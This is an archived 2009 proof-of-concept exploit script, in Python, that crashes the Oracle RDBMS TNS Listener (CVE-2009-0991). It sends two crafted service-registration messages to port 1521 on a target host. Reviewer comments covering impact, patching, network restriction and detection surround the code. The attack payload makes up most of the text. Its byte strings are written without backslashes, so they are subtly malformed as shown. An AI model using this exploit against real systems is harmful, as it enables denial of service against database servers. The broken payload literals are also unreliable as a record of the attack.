
oraclerdbms-poc.txt

Posted on 21 April 2009

# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process
# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)
# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied
# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>
# Fixed in CPUapr2009, CVE-2009-0991
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html
#
# Reviewer notes (defensive reading of this archived proof of concept):
# - Impact as stated by the author is a trap (crash) in the Listener process,
#   i.e. loss of availability of the listener. The page makes no claim beyond
#   that.
# - The script opens one TCP connection to port 1521, sends a message, reads
#   one reply, sends a second message and closes. No credentials are sent at
#   any point, so anything that can reach the listener port can reach this
#   code path on an unpatched host.
# - Remediation named on the page: Oracle Critical Patch Update April 2009.
#   Independently of patching, limit which hosts may reach the listener port
#   (network filtering, or Oracle Net valid node checking via
#   tcp.validnode_checking / tcp.invited_nodes in sqlnet.ora).
# - Detection ideas: unexpected termination or restart of the listener
#   process, and service-registration commands arriving from hosts that are
#   not database instances.
# - The string literals below are reproduced exactly as this page shows them.
#   Treat the listing as an archival copy, not as a byte-accurate packet
#   capture, when writing signatures; verify against the original advisory.

from sys import *
from socket import *

# Plain TCP client socket; the target host is the first command-line argument
# and the port is fixed at 1521.
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 1521))

# First message. Read as hex pairs, its tail spells
# "(CONNECT_DATA=(COMMAND=service_register_NSGR))", i.e. it asks the listener
# to enter its service-registration exchange.
sockobj.send(
    "x00x68x00x00x01x00x00x00x01x3Ax01x2Cx00x00x20x00"
    "x7FxFFxC6x0Ex00x00x01x00x00x2Ex00x3Ax00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x28x43x4Fx4Ex4Ex45"
    "x43x54x5Fx44x41x54x41x3Dx28x43x4Fx4Dx4Dx41x4Ex44"
    "x3Dx73x65x72x76x69x63x65x5Fx72x65x67x69x73x74x65"
    "x72x5Fx4Ex53x47x52x29x29")

# The listener's reply is read (up to 102400 bytes) and then ignored; `data`
# is never used again.
data=sockobj.recv(102400)

# Second message: a much larger registration record. The header comment
# attributes the crash to memcpy() called from ncrfintn(); presumably this is
# the message that reaches it, but the page does not say which field is
# malformed - confirm against the vendor advisory.
sockobj.send(
    "x02xdex00x00x06x00x00x00x00x00x00x00x02xd4x20x08"
    "xffx03x01x00x12x34x34x34x34x34x78x10x10x32x10x32"
    "x10x32x10x32x10x32x54x76x00x78x10x32x54x76x44x00"
    "x00x80x02x00x00x00x00x04x00x00x70xe4xa5x09x90x00"
    "x23x00x00x00x42x45x43x37x36x43x32x43x43x31x33x36"
    "x2dx35x46x39x46x2dx45x30x33x34x2dx30x30x30x33x42"
    "x41x31x33x37x34x42x33x03x00x65x00x01x00x01x00x00"
    "x00x00x00x00x00x00x64x02x00x80x05x00x00x00x00x04"
    "x00x00x00x00x00x00x01x00x00x00x10x00x00x00x02x00"
    "x00x00x84xc3xccx07x01x00x00x00x84x2fxa6x09x00x00"
    "x00x00x44xa5xa2x09x25x98x18xe9x28x50x4fx28xbbxac"
    "x15x56x8ex68x1dx6dx05x00x00x00xfcxa9x36x22x0fx00"
    "x00x00x60x30xa6x09x0ax00x00x00x64x00x00x00x00x00"
    "x00x00xaax00x00x00x00x01x00x00x17x00x00x00x78xc3"
    "xccx07x6fx72x63x6cx00x28x48x4fx53x54x3dx77x69x6e"
    "x32x30x30x33x29x00x01x00x00x00x09x00x00x00x01x00"
    "x00x00x50xc5x2fx22x02x00x00x00x34xc5x2fx22x00x00"
    "x00x00x9cxc5xccx07x6fx72x63x6cx5fx58x50x54x00x09"
    "x00x00x00x50xc5x2fx22x04x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x34xc5xccx07x6fx72x63x6cx5f"
    "x58x50x54x00x01x00x00x00x05x00x00x00x01x00x00x00"
    "x84xc5x2fx22x02x00x00x00x68xc5x2fx22x00x00x00x00"
    "xa4xa5xa2x09x6fx72x63x6cx00x05x00x00x00x84xc5x2f"
    "x22x04x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00xfcxc4xccx07x6fx72x63x6cx00x01x00x00x00x10x00"
    "x00x00x02x00x00x00xbcxc3xccx07x00x00x00x00xb0x2f"
    "xa6x09x00x00x00x00x00x00x00x00x89xc0xb1xc3x08x1d"
    "x46x6dxb6xcfxd1xddx2cxa7x66x6dx0ax00x00x00x78x2b"
    "xbcx04x7fx00x00x00x64xa7xa2x09x0dx00x00x00x20x2c"
    "xbcx04x11x00x00x00x95x00x00x00x02x20x00x80x03x00"
    "x00x00x98xc5x2fx22x00x00x00x00x00x00x00x00x0ax00"
    "x00x00xb0xc3xccx07x44x45x44x49x43x41x54x45x44x00"
    "x28x41x44x44x52x45x53x53x3dx28x50x52x4fx54x4fx43"
    "x4fx4cx3dx42x45x51x29x28x50x52x4fx47x52x41x4dx3d"
    "x43x3ax5cx61x70x70x5cx41x64x6dx69x6ex69x73x74x72"
    "x61x74x6fx72x5cx70x72x6fx64x75x63x74x5cx31x31x2e"
    "x31x2ex30x5cx64x62x5fx31x5cx62x69x6ex5cx6fx72x61"
    "x63x6cx65x2ex65x78x65x29x28x41x52x47x56x30x3dx6f"
    "x72x61x63x6cx65x6fx72x63x6cx29x28x41x52x47x53x3d"
    "x27x28x4cx4fx43x41x4cx3dx4ex4fx29x27x29x29x00x4c"
    "x4fx43x41x4cx20x53x45x52x56x45x52x00x68xc5x2fx22"
    "x34xc5x2fx22x00x00x00x00x05x00x00x00x84xc5x2fx22"
    "x04x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "xfcxc4xccx07x6fx72x63x6cx00x09x00x00x00x50xc5x2f"
    "x22x04x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x34xc5xccx07x6fx72x63x6cx5fx58x50x54x00"
    )

# The connection is closed without reading any further reply.
sockobj.close()

 

